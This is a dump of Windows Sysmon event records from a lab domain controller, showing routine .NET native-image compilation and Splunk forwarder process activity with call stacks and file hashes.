13:49:47.010{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-4F03-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.010{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-4F03-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.010{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-4F03-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:46.995{59A5CD1D-91FA-6005-4E03-00000000A301}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13ac-0\Microsoft.GroupPolicy.Commands.dll2021-01-18 13:49:46.995 10341000x80000000000000007719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.948{59A5CD1D-91FC-6005-5F03-00000000A301}45444100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FC-6005-6003-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.885{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-6003-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.885{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FC-6005-6003-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 
10341000x80000000000000007715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FC-6005-5F03-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5F03-00000000A301}4544C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FC-6005-5F03-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.792{59A5CD1D-91FC-6005-5F03-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FC-6005-5E03-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.417{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5E03-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.417{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FC-6005-5E03-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.354{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FC-6005-5D03-00000000A301}1068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.338{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5D03-00000000A301}1068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
